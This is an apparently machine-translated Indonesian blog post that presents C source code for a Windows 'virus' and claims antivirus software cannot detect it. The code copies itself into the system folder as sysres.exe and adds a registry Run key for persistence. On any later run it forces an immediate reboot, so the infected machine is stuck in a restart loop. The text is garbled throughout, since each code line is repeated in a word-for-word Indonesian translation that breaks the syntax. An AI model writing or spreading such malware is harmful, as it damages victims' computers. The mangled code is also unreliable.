Untuk ini, virus perlu doubleclicked hanya sekali dan sejak saat itu dan seterusnya akan membawa keluar sisa operasi.Dan satu hal lagi, tidak ada software antivirus mendeteksi's ini sebagai virus karena saya telah dikodekan dalam C virus ini.Jadi jika Anda terbiasa dengan bahasa C maka terlalu mudah untuk memahami logika di balik coding.
Berikut adalah kode sumber.
#include
#include
#include
int found,drive_no;char buff[128]; int ditemukan, drive_no; [buff char 128];
void findroot() void findroot ()
{ (
int done; int selesai;
struct ffblk ffblk; //File block structure struct ffblk ffblk; / / File struktur blok
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive dilakukan = findfirst ("C: \ \ windows \" sistem, & ffblk, FA_DIREC); / / untuk menentukan drive root
if(done==0) if (dilakukan == 0)
{ (
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not dilakukan = findfirst ("C: \ \ windows \ \ sistem \ \ sysres.exe", & ffblk, 0); / / untuk menentukan apakah virus sudah diinstal atau tidak
if(done==0) if (dilakukan == 0)
{ (
found=1; //means that the system is already infected ditemukan = 1; / / berarti bahwa sistem ini sudah terinfeksi
return; kembali;
} )
drive_no=1; drive_no = 1;
return; kembali;
} )
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC); dilakukan = findfirst ("D: \ \ windows \ \" sistem, & ffblk, FA_DIREC);
if(done==0) if (dilakukan == 0)
{ (
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0); dilakukan = findfirst ("D: \ \ windows \ \ system \ \ sysres.exe", & ffblk, 0);
if jika
(done==0) (Dilakukan == 0)
{ (
found=1;return; ditemukan = 1; kembali;
} )
drive_no=2; drive_no = 2;
return; kembali;
} )
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC); dilakukan = findfirst ("E: \ \ windows \ \" sistem, & ffblk, FA_DIREC);
if(done==0) if (dilakukan == 0)
{ (
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0); dilakukan = findfirst ("E: \ \ windows \ sistem \ sysres.exe", & ffblk, 0);
if(done==0) if (dilakukan == 0)
{ (
found=1; ditemukan = 1;
return; kembali;
} )
drive_no=3; drive_no = 3;
return; kembali;
} )
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC); dilakukan = findfirst ("F: \ windows \ \ \" sistem, & ffblk, FA_DIREC);
if(done==0) if (dilakukan == 0)
{ (
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0); dilakukan = findfirst ("F: \ windows \ \ \ sistem \ \ sysres.exe", & ffblk, 0);
if(done==0) if (dilakukan == 0)
{ (
found=1; ditemukan = 1;
return; kembali;
} )
drive_no=4; drive_no = 4;
return; kembali;
} )
else lain
exit(0); exit (0);
} )
void main() void main ()
{ (
FILE *self,*target; FILE * sendiri, * target;
findroot(); findroot ();
if(found==0) //if the system is not already infected if (ditemukan == 0) / / jika sistem belum terinfeksi
{ (
self=fopen(_argv[0],”rb”); //The virus file open's itself diri = fopen (_argv [0], "rb"); / / File virus itu sendiri terbuka
switch(drive_no) switch (drive_no)
{ (
case 1: kasus 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place target = fopen ("C: \ \ windows \ \ sistem \ \ sysres.exe", "WB"); / / untuk menempatkan salinan dari dirinya sendiri di tempat terpencil
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \
CurrentVersion\\Run \/v sres \/t REG_SZ \/d CurrentVersion \ \ Run \ / v sres \ / t REG_SZ \ / d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup C: \ \ windows \ \ sistem \ \ sysres.exe "); / / meletakkan file ini ke registri untuk starup
break; break;
case 2: kasus 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”); target = fopen ("D: \ \ windows \ \ sistem \ \ sysres.exe", "WB");
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \
CurrentVersion\\Run \/v sres \/t REG_SZ \/d CurrentVersion \ \ Run \ / v sres \ / t REG_SZ \ / d
D:\\windows\\system\\sysres.exe”); D: \ \ windows \ \ sistem \ \ sysres.exe ");
break; break;
case 3: kasus 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”); target = fopen ("E: \ \ windows \ \ sistem \ \ sysres.exe", "WB");
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \
CurrentVersion\\Run \/v sres \/t REG_SZ \/d CurrentVersion \ \ Run \ / v sres \ / t REG_SZ \ / d
E:\\windows\\system\\sysres.exe”); E: \ \ windows \ \ sistem \ \ sysres.exe ");
break; break;
case 4: Kasus 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”); target = fopen ("F: \ windows \ \ \ system \ \ sysres.exe", "WB");
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\ system ("REG ADD HKEY_CURRENT_USER \ \ Software \ \ Microsoft \ \ Windows \ \
CurrentVersion\\Run \/v sres \/t REG_SZ \/d CurrentVersion \ \ Run \ / v sres \ / t REG_SZ \ / d
F:\\windows\\system\\sysres.exe”); F: \ windows \ \ \ sistem \ \ sysres.exe ");
break; break;
default: default:
exit(0); exit (0);
} )
while(fread(buff,1,1,self)>0) while (fread (buff, 1,1, diri)> 0)
fwrite(buff,1,1,target); fwrite (buff, 1,1, target);
fcloseall(); fcloseall ();
} )
else lain
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart system ("shutdown-r-t 0"); / / jika sistem sudah terinfeksi kemudian hanya memberikan perintah untuk restart
)
0 komentar:
Posting Komentar